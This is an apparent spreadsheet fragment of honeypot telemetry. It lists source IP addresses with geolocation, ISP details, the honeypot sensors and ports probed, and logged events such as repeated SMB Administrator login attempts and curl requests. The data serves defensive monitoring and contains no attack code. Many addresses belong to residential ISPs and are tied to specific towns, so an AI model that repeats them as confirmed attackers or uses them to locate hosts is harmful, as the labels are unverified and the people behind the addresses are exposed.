    <t>::ffff:75d1:5c88</t>
  </si>
  <si>
    <t>77566f3e2c5768f9161546a1cdfa355b</t>
  </si>
  <si>
    <t>66.24.132.106</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-066-024-132-106.res.spectrum.com</t>
  </si>
  <si>
    <t>Chemung</t>
  </si>
  <si>
    <t>Elmira</t>
  </si>
  <si>
    <t>5116497</t>
  </si>
  <si>
    <t>14903</t>
  </si>
  <si>
    <t>42.1386</t>
  </si>
  <si>
    <t>-76.8836</t>
  </si>
  <si>
    <t>2000-09-28</t>
  </si>
  <si>
    <t>ROADRUNNER-NYS</t>
  </si>
  <si>
    <t>::ffff:4218:846a</t>
  </si>
  <si>
    <t>9d2146f83f9c6d7fe90ba1977313db86</t>
  </si>
  <si>
    <t>59.93.227.241</t>
  </si>
  <si>
    <t>::ffff:3b5d:e3f1</t>
  </si>
  <si>
    <t>de861f0f9ca13c21459430f27e7b54e3</t>
  </si>
  <si>
    <t>190.147.181.243</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>Bogotá (Comuna Chapinero)</t>
  </si>
  <si>
    <t>4.64814</t>
  </si>
  <si>
    <t>-74.0593</t>
  </si>
  <si>
    <t>10620</t>
  </si>
  <si>
    <t>Telmex Colombia S.A.</t>
  </si>
  <si>
    <t>::ffff:be93:b5f3</t>
  </si>
  <si>
    <t>af3fd95f89464aa370fbc10bba760501</t>
  </si>
  <si>
    <t>191.0.84.44</t>
  </si>
  <si>
    <t>Pinheiral</t>
  </si>
  <si>
    <t>3453767</t>
  </si>
  <si>
    <t>-22.5128</t>
  </si>
  <si>
    <t>-44.0006</t>
  </si>
  <si>
    <t>::ffff:bf00:542c</t>
  </si>
  <si>
    <t>3d7a653694f6c0a47a7b4da37c626cf6</t>
  </si>
  <si>
    <t>112.166.179.156</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;161&amp;&amp;NA</t>
  </si>
  <si>
    <t>44</t>
  </si>
  <si>
    <t>Chungcheongnam-do</t>
  </si>
  <si>
    <t>Cheongyang-gun</t>
  </si>
  <si>
    <t>Cheongyang-gun (Cheongyang-eup)</t>
  </si>
  <si>
    <t>1845490</t>
  </si>
  <si>
    <t>36.4535</t>
  </si>
  <si>
    <t>126.807</t>
  </si>
  <si>
    <t>::ffff:70a6:b39c</t>
  </si>
  <si>
    <t>ada2737efb624803ebdf06061768c57d</t>
  </si>
  <si>
    <t>138.99.108.108</t>
  </si>
  <si>
    <t>NA&amp;&amp;138-99-108-108.wspfibra.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H22</t>
  </si>
  <si>
    <t>52747</t>
  </si>
  <si>
    <t>Wsp Serviços de Telecomunicações Ltda</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,64316)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,63225)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,63896)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,52472)}&amp;&amp;{Data_SMB:Incoming connection (138.99.108.108,52748)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>2025-02-07 00:00:00</t>
  </si>
  <si>
    <t>2027-02-07 00:00:00</t>
  </si>
  <si>
    <t>2025-02-21 00:00:00</t>
  </si>
  <si>
    <t>['20250414 DSOK', 'published']</t>
  </si>
  <si>
    <t>::ffff:8a63:6c6c</t>
  </si>
  <si>
    <t>1180aba758ec470fc11830c8628e9039</t>
  </si>
  <si>
    <t>117.199.43.102</t>
  </si>
  <si>
    <t>::ffff:75c7:2b66</t>
  </si>
  <si>
    <t>97b4db074b4ab1d9a623ba4ab5ff3af9</t>
  </si>
  <si>
    <t>220.133.104.68</t>
  </si>
  <si>
    <t>220-133-104-68.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>::ffff:dc85:6844</t>
  </si>
  <si>
    <t>e7df6b42f817770e28a49baf21491da5</t>
  </si>
  <si>
    <t>146.190.77.207</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>3306&amp;&amp;5432</t>
  </si>
  <si>
    <t>Hudson</t>
  </si>
  <si>
    <t>North Bergen</t>
  </si>
  <si>
    <t>5101879</t>
  </si>
  <si>
    <t>07047</t>
  </si>
  <si>
    <t>40.8054</t>
  </si>
  <si>
    <t>-74.0241</t>
  </si>
  <si>
    <t>2021-10-14</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}</t>
  </si>
  <si>
    <t>::ffff:92be:4dcf</t>
  </si>
  <si>
    <t>937ec2cfc68e58baaf5b95f1e1982044</t>
  </si>
  <si>
    <t>113.163.55.207</t>
  </si>
  <si>
    <t>::ffff:71a3:37cf</t>
  </si>
  <si>
    <t>9aae3d1cb1b02444e1e444d1f6795061</t>
  </si>
  <si>
    <t>59.95.83.88</t>
  </si>
  <si>
    <t>::ffff:3b5f:5358</t>
  </si>
  <si>
    <t>eb7a12cf24cb249efdf3d7187359e737</t>
  </si>
  <si>
    <t>59.98.184.123</t>
  </si>
  <si>
    <t>::ffff:3b62:b87b</t>
  </si>
  <si>
    <t>430d5ee4ac5e1464e43f6c5bc9909a58</t>
  </si>
  <si>
    <t>103.5.132.29</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}</t>
  </si>
  <si>
    <t>BBNL</t>
  </si>
  <si>
    <t>2011-09-21</t>
  </si>
  <si>
    <t>::ffff:6705:841d</t>
  </si>
  <si>
    <t>24fe70224b3ea80e3b6e1ef11efbc784</t>
  </si>
  <si>
    <t>117.235.73.181</t>
  </si>
  <si>
    <t>::ffff:75eb:49b5</t>
  </si>
  <si>
    <t>44b52d4c56a14e6eddf0294c6c5ce021</t>
  </si>
  <si>
    <t>117.199.19.97</t>
  </si>
  <si>
    <t>::ffff:75c7:1361</t>
  </si>
  <si>
    <t>832dda4b85b4ece55547e3d0e67439ae</t>
  </si>
  <si>
    <t>61.2.45.28</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H26</t>
  </si>
  <si>
    <t>2001-12-27</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53178)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53326)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53482)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53641)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53765)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,53901)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54030)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54158)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54265)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54675)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,54797)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,56761)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,56904)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57073)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57232)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57388)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57536)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57675)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57799)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,57938)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58082)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58220)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58362)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58523)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58659)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,58825)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,59001)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,59135)}&amp;&amp;{Data_SMB:Incoming connection (61.2.45.28,59290)}</t>
  </si>
  <si>
    <t>::ffff:3d02:2d1c</t>
  </si>
  <si>
    <t>b8e3fdf474f07fecdd3d33d638230cbf</t>
  </si>
  <si>
    <t>182.59.230.153</t>
  </si>
  <si>
    <t>::ffff:b63b:e699</t>
  </si>
  <si>
    <t>fa1aa62409c9fb29c658bfd5784edbfd</t>
  </si>
  <si>
    <t>175.176.186.157</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>55049&amp;&amp;3306&amp;&amp;1433&amp;&amp;62080&amp;&amp;64165&amp;&amp;445</t>
  </si>
  <si>
    <t>30.8915</t>
  </si>
  <si>
    <t>75.802</t>
  </si>
  <si>
    <t>2015-12-01</t>
  </si>
  <si>
    <t>NETPLUS</t>
  </si>
  <si>
    <t>None&amp;&amp;connection&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (175.176.186.157,64184)}&amp;&amp;{Data_SMB:Incoming connection (175.176.186.157,62146)}</t>
  </si>
  <si>
    <t>::ffff:afb0:ba9d</t>
  </si>
  <si>
    <t>a33fad93210da701c41131f4add88580</t>
  </si>
  <si>
    <t>117.221.156.69</t>
  </si>
  <si>
    <t>::ffff:75dd:9c45</t>
  </si>
  <si>
    <t>67a4bd62472f4a204ced0a3bbf3fd9f1</t>
  </si>
  <si>
    <t>117.199.193.184</t>
  </si>
  <si>
    <t>::ffff:75c7:c1b8</t>
  </si>
  <si>
    <t>0f20675b29307cb88081d4f7037f20f8</t>
  </si>
  <si>
    <t>117.215.102.95</t>
  </si>
  <si>
    <t>::ffff:75d7:665f</t>
  </si>
  <si>
    <t>51d20fe5acc05e9b845cc4618ee15b15</t>
  </si>
  <si>
    <t>120.56.101.113</t>
  </si>
  <si>
    <t>::ffff:7838:6571</t>
  </si>
  <si>
    <t>1b3d3d8e80b7408c5cd305200ec917c3</t>
  </si>
  <si>
    <t>193.243.220.82</t>
  </si>
  <si>
    <t>Ümraniye</t>
  </si>
  <si>
    <t>10400338</t>
  </si>
  <si>
    <t>41.0022</t>
  </si>
  <si>
    <t>29.0686</t>
  </si>
  <si>
    <t>15924</t>
  </si>
  <si>
    <t>BORUSANTELEKOM-AS</t>
  </si>
  <si>
    <t>Borusan Telekom</t>
  </si>
  <si>
    <t>::ffff:c1f3:dc52</t>
  </si>
  <si>
    <t>3967a1bda62e89e5d675c93843b88cab</t>
  </si>
  <si>
    <t>103.199.117.164</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;53001</t>
  </si>
  <si>
    <t>Karanganyar Regency</t>
  </si>
  <si>
    <t>Karanganyar</t>
  </si>
  <si>
    <t>1641315</t>
  </si>
  <si>
    <t>-7.59833</t>
  </si>
  <si>
    <t>110.944</t>
  </si>
  <si>
    <t>150924</t>
  </si>
  <si>
    <t>PT Hepra Teknologi Indonesia</t>
  </si>
  <si>
    <t>Hepra</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,60694)}&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,61160)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,58701)}&amp;&amp;{Data_SMB:Incoming connection (103.199.117.164,59403)}</t>
  </si>
  <si>
    <t>::ffff:67c7:75a4</t>
  </si>
  <si>
    <t>4e1de8e7ca258a744d9c8939301b2560</t>
  </si>
  <si>
    <t>14.241.69.209</t>
  </si>
  <si>
    <t>::ffff:ef1:45d1</t>
  </si>
  <si>
    <t>347959a27d5d3fb1ed03ca14728aed85</t>
  </si>
  <si>
    <t>46.118.62.231</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;59700&amp;&amp;48882</t>
  </si>
  <si>
    <t>Nikopol Raion</t>
  </si>
  <si>
    <t>Nikopol</t>
  </si>
  <si>
    <t>700051</t>
  </si>
  <si>
    <t>47.5675</t>
  </si>
  <si>
    <t>34.394800000000004</t>
  </si>
  <si>
    <t>Golden Telecom LLC</t>
  </si>
  <si>
    <t>::ffff:2e76:3ee7</t>
  </si>
  <si>
    <t>600df4afd1ba7e3241d2600cf0dc9d04</t>
  </si>
  <si>
    <t>80.43.170.146</t>
  </si>
  <si>
    <t>host-80-43-170-146.as13285.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Salford</t>
  </si>
  <si>
    <t>2638671</t>
  </si>
  <si>
    <t>M5 3FU</t>
  </si>
  <si>
    <t>53.4676</t>
  </si>
  <si>
    <t>-2.27893</t>
  </si>
  <si>
    <t>9105</t>
  </si>
  <si>
    <t>::ffff:502b:aa92</t>
  </si>
  <si>
    <t>8aad66511cae404d88916dc3a7f5a162</t>
  </si>
  <si>
    <t>117.194.55.171</t>
  </si>
  <si>
    <t>::ffff:75c2:37ab</t>
  </si>
  <si>
    <t>af1da8c63ba7702b5817d199eece8b2f</t>
  </si>
  <si>
    <t>36.67.217.181</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;4741&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,21161)}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,21305)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,8687)}&amp;&amp;{Data_SMB:Incoming connection (36.67.217.181,45757)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:2443:d9b5</t>
  </si>
  <si>
    <t>9a0e3cfe1e2e476c36ac263790ab22d1</t>
  </si>
  <si>
    <t>195.189.197.105</t>
  </si>
  <si>
    <t>Mykolaiv</t>
  </si>
  <si>
    <t>Voznesensk Raion</t>
  </si>
  <si>
    <t>Pivdennoukrainsk</t>
  </si>
  <si>
    <t>7525990</t>
  </si>
  <si>
    <t>47.8288</t>
  </si>
  <si>
    <t>31.1751</t>
  </si>
  <si>
    <t>39908</t>
  </si>
  <si>
    <t>Daughter Company Television Systems KVANT of PrJSC Atomservice</t>
  </si>
  <si>
    <t>Daughter Company Television Systems KVANT of CJSC Atomservice</t>
  </si>
  <si>
    <t>::ffff:c3bd:c569</t>
  </si>
  <si>
    <t>b49370a35f646d8a2560e63728b8c87f</t>
  </si>
  <si>
    <t>117.211.134.227</t>
  </si>
  <si>
    <t>::ffff:75d3:86e3</t>
  </si>
  <si>
    <t>68074e2b362bc51868367a759a533e8c</t>
  </si>
  <si>
    <t>77.100.0.152</t>
  </si>
  <si>
    <t>shef-18-b2-v4wan-166465-cust151.vm3.cable.virginm.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Sheffield</t>
  </si>
  <si>
    <t>Oughtibridge</t>
  </si>
  <si>
    <t>2640832</t>
  </si>
  <si>
    <t>53.4361</t>
  </si>
  <si>
    <t>-1.53902</t>
  </si>
  <si>
    <t>::ffff:4d64:98</t>
  </si>
  <si>
    <t>f75d4aa68ed660062d67bbb8917ea3f3</t>
  </si>
  <si>
    <t>103.147.84.100</t>
  </si>
  <si>
    <t>-6.21462</t>
  </si>
  <si>
    <t>139955</t>
  </si>
  <si>
    <t>PT DATA PRIMA SOLUSINDO</t>
  </si>
  <si>
    <t>::ffff:6793:5464</t>
  </si>
  <si>
    <t>d29586b7e028f7089663962f6464fd62</t>
  </si>
  <si>
    <t>114.34.243.178</t>
  </si>
  <si>
    <t>114-34-243-178.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7222:f3b2</t>
  </si>
  <si>
    <t>50f8a646a7c65758b1848981b46bba25</t>
  </si>
  <si>
    <t>123.209.64.241</t>
  </si>
  <si>
    <t>1001</t>
  </si>
  <si>
    <t>-33.8688</t>
  </si>
  <si>
    <t>151.209</t>
  </si>
  <si>
    <t>Telstra Limited</t>
  </si>
  <si>
    <t>::ffff:7bd1:40f1</t>
  </si>
  <si>
    <t>f514fd466cba84e9bd52fb13687c3b56</t>
  </si>
  <si>
    <t>103.134.6.37</t>
  </si>
  <si>
    <t>401305</t>
  </si>
  <si>
    <t>19.3776</t>
  </si>
  <si>
    <t>72.8179</t>
  </si>
  <si>
    <t>ROA</t>
  </si>
  <si>
    <t>Amar Broadband Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:6786:625</t>
  </si>
  <si>
    <t>f219e36c13b8298f55244fb4c89f7b78</t>
  </si>
  <si>
    <t>202.140.131.9</t>
  </si>
  <si>
    <t>::ffff:ca8c:8309</t>
  </si>
  <si>
    <t>7f3d18639ab82c1a24071169b237fe71</t>
  </si>
  <si>
    <t>114.35.41.121</t>
  </si>
  <si>
    <t>114-35-41-121.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;13876&amp;&amp;80&amp;&amp;41240&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7223:2979</t>
  </si>
  <si>
    <t>eccbc5aefce966b79a46c45f30eec894</t>
  </si>
  <si>
    <t>119.234.21.14</t>
  </si>
  <si>
    <t>Novena</t>
  </si>
  <si>
    <t>7281987</t>
  </si>
  <si>
    <t>1.31697</t>
  </si>
  <si>
    <t>103.844</t>
  </si>
  <si>
    <t>45143</t>
  </si>
  <si>
    <t>SINGTELMOBILE-AS-AP</t>
  </si>
  <si>
    <t>Singapore Telecom Mobile Pte Ltd</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/364.0.744893471 Mobile/15E148 Safari/604.1}</t>
  </si>
  <si>
    <t>::ffff:77ea:150e</t>
  </si>
  <si>
    <t>4db2c1cccec7b6037310743561816c66</t>
  </si>
  <si>
    <t>117.240.141.252</t>
  </si>
  <si>
    <t>::ffff:75f0:8dfc</t>
  </si>
  <si>
    <t>813b48b31eaab42d61ddeebd99f7967a</t>
  </si>
  <si>
    <t>103.67.49.210</t>
  </si>
  <si>
    <t>AC</t>
  </si>
  <si>
    <t>Aceh</t>
  </si>
  <si>
    <t>Pidie Jaya Regency</t>
  </si>
  <si>
    <t>Lueng Putu</t>
  </si>
  <si>
    <t>6699784</t>
  </si>
  <si>
    <t>5.25724</t>
  </si>
  <si>
    <t>96.0649</t>
  </si>
  <si>
    <t>141672</t>
  </si>
  <si>
    <t>PT Nuansa Online Mitrakom</t>
  </si>
  <si>
    <t>Nuansaaceh</t>
  </si>
  <si>
    <t>2023-10-17</t>
  </si>
  <si>
    <t>NUANSAACEH-ID</t>
  </si>
  <si>
    <t>::ffff:6743:31d2</t>
  </si>
  <si>
    <t>1cce44a7b8162166b6b035371eaa74ff</t>
  </si>
  <si>
    <t>103.148.113.136</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H13&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;10507&amp;&amp;59136&amp;&amp;1433</t>
  </si>
  <si>
    <t>Kota Cimahi</t>
  </si>
  <si>
    <t>Cimahi</t>
  </si>
  <si>
    <t>1646448</t>
  </si>
  <si>
    <t>-6.89536</t>
  </si>
  <si>
    <t>107.542</t>
  </si>
  <si>
    <t>139993</t>
  </si>
  <si>
    <t>PT. FORIT ASTA SOLUSINDO</t>
  </si>
  <si>
    <t>2020-02-11</t>
  </si>
  <si>
    <t>IDNIC-SEKOLAHAN-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,53140)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,53455)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,51229)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,59367)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,59929)}</t>
  </si>
  <si>
    <t>::ffff:6794:7188</t>
  </si>
  <si>
    <t>dc5ee299e8375937e3d5dca053d8815d</t>
  </si>
  <si>
    <t>14.191.98.202</t>
  </si>
  <si>
    <t>Tam Bình District</t>
  </si>
  <si>
    <t>Tam Bình</t>
  </si>
  <si>
    <t>1567201</t>
  </si>
  <si>
    <t>10.0481</t>
  </si>
  <si>
    <t>106.0</t>
  </si>
  <si>
    <t>::ffff:ebf:62ca</t>
  </si>
  <si>
    <t>a6c8d60bd6600f2be53510bfed9e111f</t>
  </si>
  <si>
    <t>103.93.104.13</t>
  </si>
  <si>
    <t>11.0176</t>
  </si>
  <si>
    <t>76.9674</t>
  </si>
  <si>
    <t>58898</t>
  </si>
  <si>
    <t>Rainbow communications India Pvt Ltd</t>
  </si>
  <si>
    <t>Sangakpm</t>
  </si>
  <si>
    <t>SANGAKPM</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.104.13,59009)}&amp;&amp;{Data_SMB:Incoming connection (103.93.104.13,59600)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:675d:680d</t>
  </si>
  <si>
    <t>12a10232dfd4a8d8d5d371f3501bcc9f</t>
  </si>
  <si>
    <t>210.16.85.38</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;54578&amp;&amp;55291</t>
  </si>
  <si>
    <t>Ramanathapuram</t>
  </si>
  <si>
    <t>Paramagudi</t>
  </si>
  <si>
    <t>1260387</t>
  </si>
  <si>
    <t>9.54633</t>
  </si>
  <si>
    <t>78.5907</t>
  </si>
  <si>
    <t>2016-01-21</t>
  </si>
  <si>
    <t>SRIVARI</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,54578)}&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,55291)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,65402)}&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,49997)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:d210:5526</t>
  </si>
  <si>
    <t>854d7cf69d5823aa8fb11153f3232dfc</t>
  </si>
  <si>
    <t>182.78.253.82</t>
  </si>
  <si>
    <t>28.5493</t>
  </si>
  <si>
    <t>77.2678</t>
  </si>
  <si>
    <t>::ffff:b64e:fd52</t>
  </si>
  <si>
    <t>3b661226f61c4e546f8d896c6844d298</t>
  </si>
  <si>
    <t>75.147.236.86</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Butte</t>
  </si>
  <si>
    <t>Chico</t>
  </si>
  <si>
    <t>5336269</t>
  </si>
  <si>
    <t>95926</t>
